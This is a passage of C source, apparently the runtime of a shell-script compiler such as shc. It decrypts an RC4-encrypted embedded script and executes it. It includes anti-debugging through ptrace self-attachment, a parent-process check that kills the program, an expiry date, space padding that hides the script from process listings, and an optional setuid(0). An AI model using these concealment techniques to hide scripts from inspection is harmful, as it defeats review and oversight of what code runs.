	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
